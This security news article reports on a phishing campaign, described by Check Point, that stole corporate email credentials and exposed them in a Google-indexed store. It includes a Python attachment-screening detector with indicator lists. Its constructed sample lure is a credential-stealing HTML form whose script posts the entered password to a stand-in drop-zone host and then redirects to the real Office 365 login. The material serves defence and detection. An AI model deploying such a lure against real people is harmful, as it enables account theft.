Hackers Leave Stolen Email Credentials Exposed
Stolen Credentials Stored on Accessible Database
Hackers waging a phishing campaign stole more than 1,000 corporate email credentials and then stored the stolen data in a database accessible via a simple Google search, Check Point Research says.
The phishing campaign, which began in August 2020, sent emails set up to look like in-office Xerox scan notifications. The threat actors mainly targeted employees at energy and construction companies, but they also hit the retail, finance and education sectors, Check Point says.
The phishing messages contained a malicious HTML attachment that, if opened, launched a credential-stealing routine built around embedded JavaScript. The script ran in the background of the document and performed simple password checks, sent the captured data to the attackers' drop-zone server and then redirected the user to a legitimate Office 365 login page.
The threat actors made the misstep of storing the valuable stolen data in a publicly accessible database, making the credentials accessible to anyone by searching Google, the report adds.
"The Google search engine algorithm naturally indexes the internet," Check Point Research notes. "It was also capable of indexing the hackers’ pages where they temporarily stored the stolen credentials."
The security firm informed Google of the situation. While the data remains online, victims can use a Google search to check whether their stolen credentials are exposed and then change the affected passwords, Check Point says.
Attack Techniques
The attackers sent the phishing emails from compromised email accounts in an attempt to make the messages seem legitimate, the researchers say. The malicious payloads were hosted on compromised WordPress servers to help evade email security filters.
"We discovered dozens of compromised WordPress servers that hosted the malicious PHP page (named 'go.php', 'post.php', 'gate.php', 'rent.php' or 'rest.php') and processed all incoming credentials from victims of the phishing attacks," Check Point says.
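The two traits described above, an HTML attachment whose inline JavaScript posts entered credentials to a drop-zone PHP page and then hands the victim to the real Office 365 login, give a defender something concrete to screen attachments for. The following is an added example, not code from Check Point or from the article; the sample attachment, hostnames and the scoring thresholds are constructed for illustration, and only the PHP file names and the Office 365 login host come from the report.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from the Check Point description of this campaign
DROPZONE_NAMES = {"go.php", "post.php", "gate.php", "rent.php", "rest.php"}
O365_LOGIN = "login.microsoftonline.com"

class _Extractor(HTMLParser):
    # Collects inline <script> bodies and counts password inputs
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts, self.password_inputs = False, [], 0
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        elif tag == "input" and (dict(attrs).get("type") or "").lower() == "password":
            self.password_inputs += 1
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)

def score_html_attachment(html: str) -> dict:
    """Flag an attachment combining a password prompt, inline JS, a POST to a
    drop-zone PHP name and a hand-off to the genuine O365 login page."""
    p = _Extractor()
    p.feed(html)
    js = "\n".join(p.scripts)
    urls = re.findall(r"https?://[^\s'\"<>]+", js)
    f = {
        "password_field": p.password_inputs > 0,
        "inline_script": bool(js.strip()),
        "posts_to_dropzone": any(
            urlparse(u).path.rsplit("/", 1)[-1].lower() in DROPZONE_NAMES for u in urls),
        "redirects_to_o365": O365_LOGIN in js.lower()
            and re.search(r"location(\.href)?\s*=", js) is not None,
    }
    f["suspicious"] = f["password_field"] and f["inline_script"] and (
        f["posts_to_dropzone"] or f["redirects_to_o365"])
    return f

# Constructed sample lure mirroring the behaviour the report describes
# (hostnames are placeholders, not indicators from the report).
SAMPLE_LURE = """<html><body><p>Xerox scan ready. Sign in to view.</p>
<form id="f"><input name="user"><input type="password" name="pass"></form>
<script>fetch("https://wp-host.example/wp-content/post.php?x=1",
  {method: "POST", body: new FormData(document.getElementById("f"))})
  .then(function () { window.location.href = "https://login.microsoftonline.com/"; });
</script></body></html>"""
SAMPLE_BENIGN = '<html><body><p>Scan attached.</p><a href="https://intranet.example/doc">Open</a></body></html>'
```

The same scoring can be applied to each HTML attachment pulled from a mail gateway quarantine, treating `suspicious` hits as candidates for analyst review rather than as a verdict on their own.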
Commenting on the exposure of the stolen data in a publicly accessible database, Saryu Nayyar, CEO of security firm Gurucul, notes: “Attackers are susceptible to the same sort of simple configuration errors that many of them leverage against their targets. But this case also shows that attackers can operate phishing schemes successfully for many months before they're exposed.”
Other Attacks
In recent months, at least two other efforts to steal email credentials were revealed.
In December, Abnormal Security uncovered a spear-phishing campaign that used messages appearing to originate from legitimate companies to target enterprise users in an effort to steal Microsoft Office 365 credentials (see: Recent Spear-Phishing Attacks Originate From Legit Accounts).
And in November, Microsoft's Security Intelligence team warned Office 365 users about another phishing campaign that appeared to be harvesting victims' credentials (see: Microsoft Warns of Office 365 Phishing Attacks).